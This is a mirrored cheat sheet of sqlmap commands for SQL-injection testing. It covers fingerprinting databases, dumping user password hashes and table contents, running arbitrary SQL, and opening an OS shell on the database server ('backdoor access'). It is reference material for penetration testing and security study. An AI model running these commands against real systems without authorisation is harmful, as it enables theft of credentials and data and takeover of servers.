mirror of
https://github.com/Erreur32/cheat.git
synced 2024-11-18 01:40:44 +01:00
46 lines
1.5 KiB
Text
46 lines
1.5 KiB
Text
|
# Test URL and POST data and return database banner (if possible)
|
||
|
./sqlmap.py --url="<url>" --data="<post-data>" --banner
|
||
|
|
||
|
# Parse request data and test | request data can be obtained with burp
|
||
|
./sqlmap.py -r <request-file> <options>
|
||
|
|
||
|
# Fingerprint | much more information than banner
|
||
|
./sqlmap.py -r <request-file> --fingerprint
|
||
|
|
||
|
# Get database username, name, and hostname
|
||
|
./sqlmap.py -r <request-file> --current-user --current-db --hostname
|
||
|
|
||
|
# Check if user is a database admin
|
||
|
./sqlmap.py -r <request-file> --is-dba
|
||
|
|
||
|
# Get database users and password hashes
|
||
|
./sqlmap.py -r <request-file> --users --passwords
|
||
|
|
||
|
# Enumerate databases
|
||
|
./sqlmap.py -r <request-file> --dbs
|
||
|
|
||
|
# List tables for one database
|
||
|
./sqlmap.py -r <request-file> -D <db-name> --tables
|
||
|
|
||
|
# Other database commands
|
||
|
./sqlmap.py -r <request-file> -D <db-name> --columns
|
||
|
--schema
|
||
|
--count
|
||
|
# Enumeration flags
|
||
|
./sqlmap.py -r <request-file> -D <db-name>
|
||
|
-T <tbl-name>
|
||
|
-C <col-name>
|
||
|
-U <user-name>
|
||
|
|
||
|
# Extract data
|
||
|
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump
|
||
|
|
||
|
# Execute SQL Query
|
||
|
./sqlmap.py -r <request-file> --sql-query="<sql-query>"
|
||
|
|
||
|
# Append/Prepend SQL Queries
|
||
|
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"
|
||
|
|
||
|
# Get backdoor access to sql server | can give shell access
|
||
|
./sqlmap.py -r <request-file> --os-shell
|